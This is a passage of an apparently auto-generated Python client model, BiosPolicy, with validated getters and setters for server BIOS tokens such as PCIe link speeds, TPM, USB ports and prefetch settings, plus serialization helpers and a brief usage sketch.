:return: The slot_rear_nvme6state of this BiosPolicy.
:rtype: str
"""
return self._slot_rear_nvme6state
@slot_rear_nvme6state.setter
def slot_rear_nvme6state(self, slot_rear_nvme6state):
"""
Sets the slot_rear_nvme6state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 6 OptionROM configuration
:param slot_rear_nvme6state: The slot_rear_nvme6state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_rear_nvme6state not in allowed_values:
raise ValueError(
"Invalid value for `slot_rear_nvme6state` ({0}), must be one of {1}"
.format(slot_rear_nvme6state, allowed_values)
)
self._slot_rear_nvme6state = slot_rear_nvme6state
@property
def slot_rear_nvme7state(self):
"""
Gets the slot_rear_nvme7state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 7 OptionROM configuration
:return: The slot_rear_nvme7state of this BiosPolicy.
:rtype: str
"""
return self._slot_rear_nvme7state
@slot_rear_nvme7state.setter
def slot_rear_nvme7state(self, slot_rear_nvme7state):
"""
Sets the slot_rear_nvme7state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 7 OptionROM configuration
:param slot_rear_nvme7state: The slot_rear_nvme7state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_rear_nvme7state not in allowed_values:
raise ValueError(
"Invalid value for `slot_rear_nvme7state` ({0}), must be one of {1}"
.format(slot_rear_nvme7state, allowed_values)
)
self._slot_rear_nvme7state = slot_rear_nvme7state
@property
def slot_rear_nvme8state(self):
"""
Gets the slot_rear_nvme8state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 8 OptionROM configuration
:return: The slot_rear_nvme8state of this BiosPolicy.
:rtype: str
"""
return self._slot_rear_nvme8state
@slot_rear_nvme8state.setter
def slot_rear_nvme8state(self, slot_rear_nvme8state):
"""
Sets the slot_rear_nvme8state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 8 OptionROM configuration
:param slot_rear_nvme8state: The slot_rear_nvme8state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_rear_nvme8state not in allowed_values:
raise ValueError(
"Invalid value for `slot_rear_nvme8state` ({0}), must be one of {1}"
.format(slot_rear_nvme8state, allowed_values)
)
self._slot_rear_nvme8state = slot_rear_nvme8state
@property
def slot_riser1link_speed(self):
"""
Gets the slot_riser1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser1 Link Speed configuration
:return: The slot_riser1link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_riser1link_speed
@slot_riser1link_speed.setter
def slot_riser1link_speed(self, slot_riser1link_speed):
"""
Sets the slot_riser1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser1 Link Speed configuration
:param slot_riser1link_speed: The slot_riser1link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_riser1link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_riser1link_speed` ({0}), must be one of {1}"
.format(slot_riser1link_speed, allowed_values)
)
self._slot_riser1link_speed = slot_riser1link_speed
@property
def slot_riser1slot1link_speed(self):
"""
Gets the slot_riser1slot1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser1 Slot1 Link Speed configuration
:return: The slot_riser1slot1link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_riser1slot1link_speed
@slot_riser1slot1link_speed.setter
def slot_riser1slot1link_speed(self, slot_riser1slot1link_speed):
"""
Sets the slot_riser1slot1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser1 Slot1 Link Speed configuration
:param slot_riser1slot1link_speed: The slot_riser1slot1link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_riser1slot1link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_riser1slot1link_speed` ({0}), must be one of {1}"
.format(slot_riser1slot1link_speed, allowed_values)
)
self._slot_riser1slot1link_speed = slot_riser1slot1link_speed
@property
def slot_riser1slot2link_speed(self):
"""
Gets the slot_riser1slot2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser1 Slot2 Link Speed configuration
:return: The slot_riser1slot2link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_riser1slot2link_speed
@slot_riser1slot2link_speed.setter
def slot_riser1slot2link_speed(self, slot_riser1slot2link_speed):
"""
Sets the slot_riser1slot2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser1 Slot2 Link Speed configuration
:param slot_riser1slot2link_speed: The slot_riser1slot2link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_riser1slot2link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_riser1slot2link_speed` ({0}), must be one of {1}"
.format(slot_riser1slot2link_speed, allowed_values)
)
self._slot_riser1slot2link_speed = slot_riser1slot2link_speed
@property
def slot_riser1slot3link_speed(self):
"""
Gets the slot_riser1slot3link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser1 Slot3 Link Speed configuration
:return: The slot_riser1slot3link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_riser1slot3link_speed
@slot_riser1slot3link_speed.setter
def slot_riser1slot3link_speed(self, slot_riser1slot3link_speed):
"""
Sets the slot_riser1slot3link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser1 Slot3 Link Speed configuration
:param slot_riser1slot3link_speed: The slot_riser1slot3link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_riser1slot3link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_riser1slot3link_speed` ({0}), must be one of {1}"
.format(slot_riser1slot3link_speed, allowed_values)
)
self._slot_riser1slot3link_speed = slot_riser1slot3link_speed
@property
def slot_riser2link_speed(self):
"""
Gets the slot_riser2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser2 Link Speed configuration
:return: The slot_riser2link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_riser2link_speed
@slot_riser2link_speed.setter
def slot_riser2link_speed(self, slot_riser2link_speed):
"""
Sets the slot_riser2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser2 Link Speed configuration
:param slot_riser2link_speed: The slot_riser2link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_riser2link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_riser2link_speed` ({0}), must be one of {1}"
.format(slot_riser2link_speed, allowed_values)
)
self._slot_riser2link_speed = slot_riser2link_speed
@property
def slot_riser2slot4link_speed(self):
"""
Gets the slot_riser2slot4link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser2 Slot4 Link Speed configuration
:return: The slot_riser2slot4link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_riser2slot4link_speed
@slot_riser2slot4link_speed.setter
def slot_riser2slot4link_speed(self, slot_riser2slot4link_speed):
"""
Sets the slot_riser2slot4link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser2 Slot4 Link Speed configuration
:param slot_riser2slot4link_speed: The slot_riser2slot4link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_riser2slot4link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_riser2slot4link_speed` ({0}), must be one of {1}"
.format(slot_riser2slot4link_speed, allowed_values)
)
self._slot_riser2slot4link_speed = slot_riser2slot4link_speed
@property
def slot_riser2slot5link_speed(self):
"""
Gets the slot_riser2slot5link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser2 Slot5 Link Speed configuration
:return: The slot_riser2slot5link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_riser2slot5link_speed
@slot_riser2slot5link_speed.setter
def slot_riser2slot5link_speed(self, slot_riser2slot5link_speed):
"""
Sets the slot_riser2slot5link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser2 Slot5 Link Speed configuration
:param slot_riser2slot5link_speed: The slot_riser2slot5link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_riser2slot5link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_riser2slot5link_speed` ({0}), must be one of {1}"
.format(slot_riser2slot5link_speed, allowed_values)
)
self._slot_riser2slot5link_speed = slot_riser2slot5link_speed
@property
def slot_riser2slot6link_speed(self):
"""
Gets the slot_riser2slot6link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser2 Slot6 Link Speed configuration
:return: The slot_riser2slot6link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_riser2slot6link_speed
@slot_riser2slot6link_speed.setter
def slot_riser2slot6link_speed(self, slot_riser2slot6link_speed):
"""
Sets the slot_riser2slot6link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Riser2 Slot6 Link Speed configuration
:param slot_riser2slot6link_speed: The slot_riser2slot6link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_riser2slot6link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_riser2slot6link_speed` ({0}), must be one of {1}"
.format(slot_riser2slot6link_speed, allowed_values)
)
self._slot_riser2slot6link_speed = slot_riser2slot6link_speed
@property
def slot_sas_state(self):
"""
Gets the slot_sas_state of this BiosPolicy.
BIOS Token for setting PCIe Slot:SAS OptionROM configuration
:return: The slot_sas_state of this BiosPolicy.
:rtype: str
"""
return self._slot_sas_state
@slot_sas_state.setter
def slot_sas_state(self, slot_sas_state):
"""
Sets the slot_sas_state of this BiosPolicy.
BIOS Token for setting PCIe Slot:SAS OptionROM configuration
:param slot_sas_state: The slot_sas_state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot_sas_state not in allowed_values:
raise ValueError(
"Invalid value for `slot_sas_state` ({0}), must be one of {1}"
.format(slot_sas_state, allowed_values)
)
self._slot_sas_state = slot_sas_state
@property
def slot_ssd_slot1link_speed(self):
"""
Gets the slot_ssd_slot1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:FrontPcie1 Link Speed configuration
:return: The slot_ssd_slot1link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_ssd_slot1link_speed
@slot_ssd_slot1link_speed.setter
def slot_ssd_slot1link_speed(self, slot_ssd_slot1link_speed):
"""
Sets the slot_ssd_slot1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:FrontPcie1 Link Speed configuration
:param slot_ssd_slot1link_speed: The slot_ssd_slot1link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_ssd_slot1link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_ssd_slot1link_speed` ({0}), must be one of {1}"
.format(slot_ssd_slot1link_speed, allowed_values)
)
self._slot_ssd_slot1link_speed = slot_ssd_slot1link_speed
@property
def slot_ssd_slot2link_speed(self):
"""
Gets the slot_ssd_slot2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:FrontPcie2 Link Speed configuration
:return: The slot_ssd_slot2link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_ssd_slot2link_speed
@slot_ssd_slot2link_speed.setter
def slot_ssd_slot2link_speed(self, slot_ssd_slot2link_speed):
"""
Sets the slot_ssd_slot2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:FrontPcie2 Link Speed configuration
:param slot_ssd_slot2link_speed: The slot_ssd_slot2link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_ssd_slot2link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_ssd_slot2link_speed` ({0}), must be one of {1}"
.format(slot_ssd_slot2link_speed, allowed_values)
)
self._slot_ssd_slot2link_speed = slot_ssd_slot2link_speed
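# All *link_speed tokens above share one value domain: "platform-default",
# "Auto", "Disabled", and the PCIe generations "GEN1"/"GEN2"/"GEN3".
# Because each is a property, setattr() still routes through the validating
# setter, so one speed can be applied across several tokens (sketch only):
#
#     for token in ("slot_riser1link_speed", "slot_riser2link_speed"):
#         setattr(policy, token, "Auto")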
@property
def smee(self):
"""
Gets the smee of this BiosPolicy.
BIOS Token for setting SMEE configuration
:return: The smee of this BiosPolicy.
:rtype: str
"""
return self._smee
@smee.setter
def smee(self, smee):
"""
Sets the smee of this BiosPolicy.
BIOS Token for setting SMEE configuration
:param smee: The smee of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if smee not in allowed_values:
raise ValueError(
"Invalid value for `smee` ({0}), must be one of {1}"
.format(smee, allowed_values)
)
self._smee = smee
@property
def smt_mode(self):
"""
Gets the smt_mode of this BiosPolicy.
BIOS Token for setting SMT Mode configuration
:return: The smt_mode of this BiosPolicy.
:rtype: str
"""
return self._smt_mode
@smt_mode.setter
def smt_mode(self, smt_mode):
"""
Sets the smt_mode of this BiosPolicy.
BIOS Token for setting SMT Mode configuration
:param smt_mode: The smt_mode of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Off"]
if smt_mode not in allowed_values:
raise ValueError(
"Invalid value for `smt_mode` ({0}), must be one of {1}"
.format(smt_mode, allowed_values)
)
self._smt_mode = smt_mode
@property
def snc(self):
"""
Gets the snc of this BiosPolicy.
BIOS Token for setting Sub Numa Clustering configuration
:return: The snc of this BiosPolicy.
:rtype: str
"""
return self._snc
@snc.setter
def snc(self, snc):
"""
Sets the snc of this BiosPolicy.
BIOS Token for setting Sub Numa Clustering configuration
:param snc: The snc of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "disabled", "enabled"]
if snc not in allowed_values:
raise ValueError(
"Invalid value for `snc` ({0}), must be one of {1}"
.format(snc, allowed_values)
)
self._snc = snc
@property
def sparing_mode(self):
"""
Gets the sparing_mode of this BiosPolicy.
BIOS Token for setting Sparing Mode configuration
:return: The sparing_mode of this BiosPolicy.
:rtype: str
"""
return self._sparing_mode
@sparing_mode.setter
def sparing_mode(self, sparing_mode):
"""
Sets the sparing_mode of this BiosPolicy.
BIOS Token for setting Sparing Mode configuration
:param sparing_mode: The sparing_mode of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "dimm-sparing", "rank-sparing"]
if sparing_mode not in allowed_values:
raise ValueError(
"Invalid value for `sparing_mode` ({0}), must be one of {1}"
.format(sparing_mode, allowed_values)
)
self._sparing_mode = sparing_mode
@property
def sr_iov(self):
"""
Gets the sr_iov of this BiosPolicy.
BIOS Token for setting SR-IOV Support configuration
:return: The sr_iov of this BiosPolicy.
:rtype: str
"""
return self._sr_iov
@sr_iov.setter
def sr_iov(self, sr_iov):
"""
Sets the sr_iov of this BiosPolicy.
BIOS Token for setting SR-IOV Support configuration
:param sr_iov: The sr_iov of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if sr_iov not in allowed_values:
raise ValueError(
"Invalid value for `sr_iov` ({0}), must be one of {1}"
.format(sr_iov, allowed_values)
)
self._sr_iov = sr_iov
@property
def streamer_prefetch(self):
"""
Gets the streamer_prefetch of this BiosPolicy.
BIOS Token for setting DCU Streamer Prefetch configuration
:return: The streamer_prefetch of this BiosPolicy.
:rtype: str
"""
return self._streamer_prefetch
@streamer_prefetch.setter
def streamer_prefetch(self, streamer_prefetch):
"""
Sets the streamer_prefetch of this BiosPolicy.
BIOS Token for setting DCU Streamer Prefetch configuration
:param streamer_prefetch: The streamer_prefetch of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if streamer_prefetch not in allowed_values:
raise ValueError(
"Invalid value for `streamer_prefetch` ({0}), must be one of {1}"
.format(streamer_prefetch, allowed_values)
)
self._streamer_prefetch = streamer_prefetch
@property
def svm_mode(self):
"""
Gets the svm_mode of this BiosPolicy.
BIOS Token for setting SVM Mode configuration
:return: The svm_mode of this BiosPolicy.
:rtype: str
"""
return self._svm_mode
@svm_mode.setter
def svm_mode(self, svm_mode):
"""
Sets the svm_mode of this BiosPolicy.
BIOS Token for setting SVM Mode configuration
:param svm_mode: The svm_mode of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if svm_mode not in allowed_values:
raise ValueError(
"Invalid value for `svm_mode` ({0}), must be one of {1}"
.format(svm_mode, allowed_values)
)
self._svm_mode = svm_mode
@property
def terminal_type(self):
"""
Gets the terminal_type of this BiosPolicy.
BIOS Token for setting Terminal Type configuration
:return: The terminal_type of this BiosPolicy.
:rtype: str
"""
return self._terminal_type
@terminal_type.setter
def terminal_type(self, terminal_type):
"""
Sets the terminal_type of this BiosPolicy.
BIOS Token for setting Terminal Type configuration
:param terminal_type: The terminal_type of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "pc-ansi", "vt-utf8", "vt100", "vt100-plus"]
if terminal_type not in allowed_values:
raise ValueError(
"Invalid value for `terminal_type` ({0}), must be one of {1}"
.format(terminal_type, allowed_values)
)
self._terminal_type = terminal_type
@property
def tpm_control(self):
"""
Gets the tpm_control of this BiosPolicy.
BIOS Token for setting Trusted Platform Module State configuration
:return: The tpm_control of this BiosPolicy.
:rtype: str
"""
return self._tpm_control
@tpm_control.setter
def tpm_control(self, tpm_control):
"""
Sets the tpm_control of this BiosPolicy.
BIOS Token for setting Trusted Platform Module State configuration
:param tpm_control: The tpm_control of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if tpm_control not in allowed_values:
raise ValueError(
"Invalid value for `tpm_control` ({0}), must be one of {1}"
.format(tpm_control, allowed_values)
)
self._tpm_control = tpm_control
@property
def tpm_support(self):
"""
Gets the tpm_support of this BiosPolicy.
BIOS Token for setting TPM Support configuration
:return: The tpm_support of this BiosPolicy.
:rtype: str
"""
return self._tpm_support
@tpm_support.setter
def tpm_support(self, tpm_support):
"""
Sets the tpm_support of this BiosPolicy.
BIOS Token for setting TPM Support configuration
:param tpm_support: The tpm_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if tpm_support not in allowed_values:
raise ValueError(
"Invalid value for `tpm_support` ({0}), must be one of {1}"
.format(tpm_support, allowed_values)
)
self._tpm_support = tpm_support
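# TPM is governed by two cooperating tokens: tpm_support (TPM Support) and
# tpm_control (Trusted Platform Module State). The assumption here -- not
# stated by the generated docstrings -- is that both are usually enabled
# together for the TPM to be usable by the OS (illustrative sketch):
#
#     policy.tpm_support = "enabled"
#     policy.tpm_control = "enabled"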
@property
def txt_support(self):
"""
Gets the txt_support of this BiosPolicy.
BIOS Token for setting Intel Trusted Execution Technology Support configuration
:return: The txt_support of this BiosPolicy.
:rtype: str
"""
return self._txt_support
@txt_support.setter
def txt_support(self, txt_support):
"""
Sets the txt_support of this BiosPolicy.
BIOS Token for setting Intel Trusted Execution Technology Support configuration
:param txt_support: The txt_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if txt_support not in allowed_values:
raise ValueError(
"Invalid value for `txt_support` ({0}), must be one of {1}"
.format(txt_support, allowed_values)
)
self._txt_support = txt_support
@property
def ucsm_boot_order_rule(self):
"""
Gets the ucsm_boot_order_rule of this BiosPolicy.
BIOS Token for setting Boot Order Rules configuration
:return: The ucsm_boot_order_rule of this BiosPolicy.
:rtype: str
"""
return self._ucsm_boot_order_rule
@ucsm_boot_order_rule.setter
def ucsm_boot_order_rule(self, ucsm_boot_order_rule):
"""
Sets the ucsm_boot_order_rule of this BiosPolicy.
BIOS Token for setting Boot Order Rules configuration
:param ucsm_boot_order_rule: The ucsm_boot_order_rule of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Loose", "Strict"]
if ucsm_boot_order_rule not in allowed_values:
raise ValueError(
"Invalid value for `ucsm_boot_order_rule` ({0}), must be one of {1}"
.format(ucsm_boot_order_rule, allowed_values)
)
self._ucsm_boot_order_rule = ucsm_boot_order_rule
@property
def usb_emul6064(self):
"""
Gets the usb_emul6064 of this BiosPolicy.
BIOS Token for setting Port 60/64 Emulation configuration
:return: The usb_emul6064 of this BiosPolicy.
:rtype: str
"""
return self._usb_emul6064
@usb_emul6064.setter
def usb_emul6064(self, usb_emul6064):
"""
Sets the usb_emul6064 of this BiosPolicy.
BIOS Token for setting Port 60/64 Emulation configuration
:param usb_emul6064: The usb_emul6064 of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if usb_emul6064 not in allowed_values:
raise ValueError(
"Invalid value for `usb_emul6064` ({0}), must be one of {1}"
.format(usb_emul6064, allowed_values)
)
self._usb_emul6064 = usb_emul6064
@property
def usb_port_front(self):
"""
Gets the usb_port_front of this BiosPolicy.
BIOS Token for setting USB Port Front configuration
:return: The usb_port_front of this BiosPolicy.
:rtype: str
"""
return self._usb_port_front
@usb_port_front.setter
def usb_port_front(self, usb_port_front):
"""
Sets the usb_port_front of this BiosPolicy.
BIOS Token for setting USB Port Front configuration
:param usb_port_front: The usb_port_front of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if usb_port_front not in allowed_values:
raise ValueError(
"Invalid value for `usb_port_front` ({0}), must be one of {1}"
.format(usb_port_front, allowed_values)
)
self._usb_port_front = usb_port_front
@property
def usb_port_internal(self):
"""
Gets the usb_port_internal of this BiosPolicy.
BIOS Token for setting USB Port Internal configuration
:return: The usb_port_internal of this BiosPolicy.
:rtype: str
"""
return self._usb_port_internal
@usb_port_internal.setter
def usb_port_internal(self, usb_port_internal):
"""
Sets the usb_port_internal of this BiosPolicy.
BIOS Token for setting USB Port Internal configuration
:param usb_port_internal: The usb_port_internal of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if usb_port_internal not in allowed_values:
raise ValueError(
"Invalid value for `usb_port_internal` ({0}), must be one of {1}"
.format(usb_port_internal, allowed_values)
)
self._usb_port_internal = usb_port_internal
@property
def usb_port_kvm(self):
"""
Gets the usb_port_kvm of this BiosPolicy.
BIOS Token for setting USB Port KVM configuration
:return: The usb_port_kvm of this BiosPolicy.
:rtype: str
"""
return self._usb_port_kvm
@usb_port_kvm.setter
def usb_port_kvm(self, usb_port_kvm):
"""
Sets the usb_port_kvm of this BiosPolicy.
BIOS Token for setting USB Port KVM configuration
:param usb_port_kvm: The usb_port_kvm of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if usb_port_kvm not in allowed_values:
raise ValueError(
"Invalid value for `usb_port_kvm` ({0}), must be one of {1}"
.format(usb_port_kvm, allowed_values)
)
self._usb_port_kvm = usb_port_kvm
@property
def usb_port_rear(self):
"""
Gets the usb_port_rear of this BiosPolicy.
BIOS Token for setting USB Port Rear configuration
:return: The usb_port_rear of this BiosPolicy.
:rtype: str
"""
return self._usb_port_rear
@usb_port_rear.setter
def usb_port_rear(self, usb_port_rear):
"""
Sets the usb_port_rear of this BiosPolicy.
BIOS Token for setting USB Port Rear configuration
:param usb_port_rear: The usb_port_rear of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if usb_port_rear not in allowed_values:
raise ValueError(
"Invalid value for `usb_port_rear` ({0}), must be one of {1}"
.format(usb_port_rear, allowed_values)
)
self._usb_port_rear = usb_port_rear
@property
def usb_port_sd_card(self):
"""
Gets the usb_port_sd_card of this BiosPolicy.
BIOS Token for setting USB Port SD Card configuration
:return: The usb_port_sd_card of this BiosPolicy.
:rtype: str
"""
return self._usb_port_sd_card
@usb_port_sd_card.setter
def usb_port_sd_card(self, usb_port_sd_card):
"""
Sets the usb_port_sd_card of this BiosPolicy.
BIOS Token for setting USB Port SD Card configuration
:param usb_port_sd_card: The usb_port_sd_card of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if usb_port_sd_card not in allowed_values:
raise ValueError(
"Invalid value for `usb_port_sd_card` ({0}), must be one of {1}"
.format(usb_port_sd_card, allowed_values)
)
self._usb_port_sd_card = usb_port_sd_card
@property
def usb_port_vmedia(self):
"""
Gets the usb_port_vmedia of this BiosPolicy.
BIOS Token for setting USB Port VMedia configuration
:return: The usb_port_vmedia of this BiosPolicy.
:rtype: str
"""
return self._usb_port_vmedia
@usb_port_vmedia.setter
def usb_port_vmedia(self, usb_port_vmedia):
"""
Sets the usb_port_vmedia of this BiosPolicy.
BIOS Token for setting USB Port VMedia configuration
:param usb_port_vmedia: The usb_port_vmedia of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if usb_port_vmedia not in allowed_values:
raise ValueError(
"Invalid value for `usb_port_vmedia` ({0}), must be one of {1}"
.format(usb_port_vmedia, allowed_values)
)
self._usb_port_vmedia = usb_port_vmedia
@property
def usb_xhci_support(self):
"""
Gets the usb_xhci_support of this BiosPolicy.
BIOS Token for setting XHCI Legacy Support configuration
:return: The usb_xhci_support of this BiosPolicy.
:rtype: str
"""
return self._usb_xhci_support
@usb_xhci_support.setter
def usb_xhci_support(self, usb_xhci_support):
"""
Sets the usb_xhci_support of this BiosPolicy.
BIOS Token for setting XHCI Legacy Support configuration
:param usb_xhci_support: The usb_xhci_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if usb_xhci_support not in allowed_values:
raise ValueError(
"Invalid value for `usb_xhci_support` ({0}), must be one of {1}"
.format(usb_xhci_support, allowed_values)
)
self._usb_xhci_support = usb_xhci_support
@property
def vga_priority(self):
"""
Gets the vga_priority of this BiosPolicy.
BIOS Token for setting VGA Priority configuration
:return: The vga_priority of this BiosPolicy.
:rtype: str
"""
return self._vga_priority
@vga_priority.setter
def vga_priority(self, vga_priority):
"""
Sets the vga_priority of this BiosPolicy.
BIOS Token for setting VGA Priority configuration
:param vga_priority: The vga_priority of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Offboard", "Onboard", "Onboard VGA Disabled"]
if vga_priority not in allowed_values:
raise ValueError(
"Invalid value for `vga_priority` ({0}), must be one of {1}"
.format(vga_priority, allowed_values)
)
self._vga_priority = vga_priority
@property
def vmd_enable(self):
"""
Gets the vmd_enable of this BiosPolicy.
BIOS Token for setting VMD Enablement configuration
:return: The vmd_enable of this BiosPolicy.
:rtype: str
"""
return self._vmd_enable
@vmd_enable.setter
def vmd_enable(self, vmd_enable):
"""
Sets the vmd_enable of this BiosPolicy.
BIOS Token for setting VMD Enablement configuration
:param vmd_enable: The vmd_enable of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if vmd_enable not in allowed_values:
raise ValueError(
"Invalid value for `vmd_enable` ({0}), must be one of {1}"
.format(vmd_enable, allowed_values)
)
self._vmd_enable = vmd_enable
@property
def work_load_config(self):
"""
Gets the work_load_config of this BiosPolicy.
BIOS Token for setting Workload Configuration configuration
:return: The work_load_config of this BiosPolicy.
:rtype: str
"""
return self._work_load_config
@work_load_config.setter
def work_load_config(self, work_load_config):
"""
Sets the work_load_config of this BiosPolicy.
BIOS Token for setting Workload Configuration configuration
:param work_load_config: The work_load_config of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Balanced", "I/O Sensitive", "NUMA", "UMA"]
if work_load_config not in allowed_values:
raise ValueError(
"Invalid value for `work_load_config` ({0}), must be one of {1}"
.format(work_load_config, allowed_values)
)
self._work_load_config = work_load_config
@property
def xpt_prefetch(self):
"""
Gets the xpt_prefetch of this BiosPolicy.
BIOS Token for setting XPT Prefetch configuration
:return: The xpt_prefetch of this BiosPolicy.
:rtype: str
"""
return self._xpt_prefetch
@xpt_prefetch.setter
def xpt_prefetch(self, xpt_prefetch):
"""
Sets the xpt_prefetch of this BiosPolicy.
BIOS Token for setting XPT Prefetch configuration
:param xpt_prefetch: The xpt_prefetch of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if xpt_prefetch not in allowed_values:
raise ValueError(
"Invalid value for `xpt_prefetch` ({0}), must be one of {1}"
.format(xpt_prefetch, allowed_values)
)
self._xpt_prefetch = xpt_prefetch
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, BiosPolicy):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
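# Minimal usage sketch for the validated setters above (illustration only; it
# assumes BiosPolicy() can be constructed without arguments, as is typical for
# swagger-generated models).
if __name__ == "__main__":
    policy = BiosPolicy()
    policy.usb_port_front = "enabled"      # accepted: value is in allowed_values
    try:
        policy.usb_port_front = "on"       # rejected: not in allowed_values
    except ValueError as error:
        print(error)
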